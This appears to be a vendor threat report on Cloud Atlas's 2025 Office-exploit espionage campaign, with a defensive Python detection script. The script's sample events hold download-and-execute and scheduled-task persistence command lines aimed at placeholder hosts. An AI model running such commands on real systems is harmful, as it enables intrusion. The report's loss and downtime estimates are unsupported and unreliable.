Executive Summary
In the first half of 2025, the persistent threat group Cloud Atlas launched a series of sophisticated cyber-espionage campaigns targeting organizations in Russia and Belarus. Attackers employed spear-phishing emails with weaponized Microsoft Office documents exploiting CVE-2018-0802, initiating a complex multi-stage infection chain. Custom implants such as VBShower, VBCloud, CloudAtlas, and PowerShower enabled attackers to establish persistent access, exfiltrate sensitive data, steal credentials, and abuse cloud-based C2 channels. Multiple sectors were affected, including telecommunications, construction, government, and manufacturing, with operations characterized by stealthy lateral movement, DLL hijacking, and multi-layered payload delivery.
This incident is significant due to Cloud Atlas's use of novel, previously undocumented toolsets and cloud service abuse, reflecting a trend among APT actors toward cloud-based, modular attacks. It highlights the urgent need for heightened east-west security, advanced threat visibility, and multi-layered cloud controls, amid continued evolution of state-sponsored threat tactics.
Why This Matters Now
The Cloud Atlas 2025 campaign demonstrates the escalating capabilities of nation-state actors to exploit legacy vulnerabilities and harness cloud services for stealthy command and control. As APTs increasingly target sensitive sectors with advanced, modular backdoors and credential theft, organizations must urgently adapt their defenses to counter sophisticated, cloud-enabled espionage operations.
Attack Path Analysis
The attack began with phishing emails containing malicious Office documents exploiting CVE-2018-0802 to infect endpoints. Attackers gained code execution and persistence by dropping multiple implants using scheduled tasks and DLL hijacking. Backdoors enabled attackers to enumerate files, gather credentials, and potentially move laterally within internal networks and cloud services. Command and control took place via HTTP/WebDAV sessions with attacker-controlled infrastructure, using encrypted traffic to transmit beacons and receive new payloads. Data exfiltration occurred through plugins designed to steal documents, credentials, and other sensitive data, sending them to the C2 cloud storage. Though primary intent was espionage, attacker capabilities allowed for potential destructive impact by deploying malicious payloads, deleting data, or manipulating targeted systems.
Kill Chain Progression
Initial Compromise
Description
Phishing emails with malicious DOC(X)/RTF attachments exploiting the Microsoft Office Equation Editor vulnerability (CVE-2018-0802) led to the download and execution of HTA files, which established the first-stage malware.
Related CVEs
CVE-2018-0802
CVSS 7.8
A memory corruption vulnerability in Microsoft Office's Equation Editor allows remote code execution when processing specially crafted files.
Affected Products:
Microsoft Office – 2007 SP3, 2010 SP2, 2013 SP1, 2016
Exploit Status:
exploited in the wild
CVE-2017-11882
CVSS 7.8
A memory corruption vulnerability in Microsoft Office's Equation Editor allows remote code execution when processing specially crafted files.
Affected Products:
Microsoft Office – 2007 SP3, 2010 SP2, 2013 SP1, 2016
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
MITRE ATT&CK mapping reflects key techniques observed in Cloud Atlas's 2025 campaign and may be enhanced with deeper STIX/TAXII alignment in future iterations.
Spearphishing Attachment
Exploitation for Client Execution
Command and Scripting Interpreter: Visual Basic
Scheduled Task/Job: Scheduled Task
Hijack Execution Flow: DLL Search Order Hijacking
Screen Capture
Exfiltration Over Web Service: Exfiltration to Cloud Storage
Credentials from Password Stores
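The attack path and ATT&CK mapping above describe three host-level stages that leave process-creation telemetry behind: an Office process (or the Equation Editor binary) handing off to a script host after the document exploit, a scheduled task whose action is a script interpreter, and a script host fetching content over HTTP or WebDAV. The following Python triage script is an added example written for this page, not detection content from the Securelist report, MITRE, or any vendor. It assumes a constructed `Key=Value|Key=Value` record format carrying Sysmon-style ParentImage, Image and CommandLine fields; the sample events, the `example.invalid` host and the `203.0.113.10` address are constructed placeholders.

```python
"""Process-creation triage for the kill-chain stages described above.

Constructed example (not Kaspersky's, MITRE's or any vendor's detection
content). Events are simplified Sysmon-style process-creation records with
ParentImage, Image and CommandLine fields; the record format and the sample
lines are constructed for this illustration.
"""
import re
from dataclasses import dataclass

# Office hosts, including the Equation Editor binary abused via CVE-2018-0802.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
# Script hosts used by HTA / VBScript / PowerShell stages.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
# An HTTP(S) URL or a WebDAV UNC path such as \\host@SSL\DavWWWRoot\...
# (applied to the lower-cased command line).
REMOTE_SOURCE = re.compile(r"https?://|\\\\[^\\\s]+\\davwwwroot")


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str      # ATT&CK technique id the rule maps to
    image: str
    command_line: str


def parse_event(line: str) -> dict:
    """Parse a 'Key=Value|Key=Value' record (constructed format) into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(event: dict) -> list[Finding]:
    """Apply the three stage rules to one event and return every match."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    low = cmd.lower()
    findings = []

    # Initial compromise: Office (or Equation Editor) launching a script host,
    # as happens when the exploit document hands off to an HTA/VBS stage.
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(Finding("office_spawns_script_host", "T1203", image, cmd))

    # Persistence: schtasks /create whose task action is a script host.
    if image == "schtasks.exe" and "/create" in low and any(h in low for h in SCRIPT_HOSTS):
        findings.append(Finding("schtasks_script_persistence", "T1053.005", image, cmd))

    # Delivery / C2: a script host pulling content from HTTP or WebDAV.
    if image in SCRIPT_HOSTS and REMOTE_SOURCE.search(low):
        findings.append(Finding("script_host_remote_fetch", "T1105", image, cmd))

    return findings


def triage_all(lines) -> list[Finding]:
    """Run triage over an iterable of raw records, preserving event order."""
    return [f for line in lines for f in triage(parse_event(line))]


# Constructed sample telemetry; example.invalid and 203.0.113.10 are placeholders.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"
    r"|Image=C:\Windows\System32\mshta.exe"
    r"|CommandLine=mshta.exe https://example.invalid/stage1.hta",
    r"ParentImage=C:\Windows\System32\cmd.exe"
    r"|Image=C:\Windows\System32\schtasks.exe"
    r'|CommandLine=schtasks.exe /create /sc minute /mo 30 /tn Updater /tr "wscript.exe C:\Users\Public\u.vbs"',
    r"ParentImage=C:\Program Files\Microsoft Office\Office16\EQNEDT32.EXE"
    r"|Image=C:\Windows\System32\wscript.exe"
    r"|CommandLine=wscript.exe \\203.0.113.10@SSL\DavWWWRoot\upd.vbs",
    r"ParentImage=C:\Windows\explorer.exe"
    r"|Image=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"
    r"|CommandLine=WINWORD.EXE report.docx",
]

if __name__ == "__main__":
    for f in triage_all(SAMPLE_EVENTS):
        print(f"{f.rule:30} {f.technique:10} {f.image}: {f.command_line}")
```

The fourth sample (Explorer launching Word to open a document) produces no finding, which is the behaviour a rule set like this must preserve: the signal is the parent-child relationship and the command-line content, not Office activity itself. In a real pipeline the same three rules would be fed from Sysmon Event ID 1 or an EDR's process-creation stream rather than the constructed format used here.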
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS v4.0 – Log and Monitor All Access to Critical System Components
Control ID: 10.2.5
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: Section 500.03
DORA (Regulation (EU) 2022/2554) – ICT Risk Management Framework
Control ID: Art. 9(2)
CISA Zero Trust Maturity Model (ZTMM) 2.0 – Continuous Monitoring and Automated Response
Control ID: Monitoring and Visibility
NIS2 Directive – Incident Handling Procedures
Control ID: Article 21(2)(e)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Telecommunications
Cloud Atlas APT targets telecommunications infrastructure, enabling lateral movement, encrypted traffic interception, and credential theft; countering this requires zero trust segmentation and threat detection capabilities.
Government Administration
Eastern European government entities face sophisticated espionage campaigns exploiting Office vulnerabilities, and require enhanced east-west traffic security and multicloud visibility to satisfy compliance frameworks.
Construction
The construction sector is targeted by APT espionage using phishing attacks and file exfiltration, necessitating egress security policy enforcement and anomaly detection to protect operational technology.
Computer Software/Engineering
Software organizations are vulnerable to Kubernetes security breaches and cloud firewall bypasses through PowerShell backdoors, requiring inline IPS and cloud native security fabric implementations.
Sources
- Cloud Atlas activity in the first half of 2025: what changed – https://securelist.com/cloud-atlas-h1-2025-campaign/118517/
- CVE-2018-0802 | INCIBE-CERT | INCIBE – https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2018-0802
- CVE-2018-0802 : Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Offic – https://www.cvedetails.com/cve/CVE-2018-0802/
- Inception, Inception Framework, Cloud Atlas, Group G0100 | MITRE ATT&CK® – https://attack.mitre.org/groups/G0100/
Frequently Asked Questions
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Zero Trust segmentation, east-west traffic controls, centralized visibility, inline threat detection, egress policy, and strong encrypted traffic inspection would have greatly constrained the attack at most points in the kill chain—limiting malware delivery, lateral movement, C2 communication, and exfiltration within both hybrid and multicloud environments.
Control: Threat Detection & Anomaly Response
Mitigation: Detection and alerting on suspicious initial-stage payloads and anomalous document behavior.
Control: Zero Trust Segmentation
Mitigation: Restricted execution scope for malicious scripts and isolation of sensitive workloads.
Control: East-West Traffic Security
Mitigation: Blocked unauthorized workload-to-workload and service-to-service lateral flows.
Control: Egress Security & Policy Enforcement
Mitigation: Detection and prevention of unauthorized outbound connections to malicious domains or cloud C2 endpoints.
Control: Encrypted Traffic (HPE) & Multicloud Visibility & Control
Mitigation: Monitor, alert, and control unauthorized encrypted data flows and anomalous transfers.
Early containment and autonomous response to detected destructive behaviors.
Impact at a Glance
Affected Business Functions
- Government Operations
- Telecommunications
- Construction
- Industrial Manufacturing
Estimated downtime: 5 days
Estimated loss: $500,000
Potential exposure of sensitive government and industrial data, including proprietary information and confidential communications.
Recommended Actions
Key Takeaways & Next Steps
- Harden inbound email and application security controls to prevent exploit-based initial compromise.
- Implement microsegmentation and zero trust network policies to restrict privilege escalations and lateral movement across all environments.
- Enforce rigorous egress controls with domain/URL filtering and encrypted traffic inspection to block unauthorized outbound C2 and data exfiltration.
- Deploy centralized, multicloud visibility and anomaly detection to catch and respond rapidly to malicious activity across east-west and hybrid-cloud flows.
- Regularly validate, test, and update zero trust enforcement policies, including automation and inline response measures, to ensure resilience against evolving APT techniques.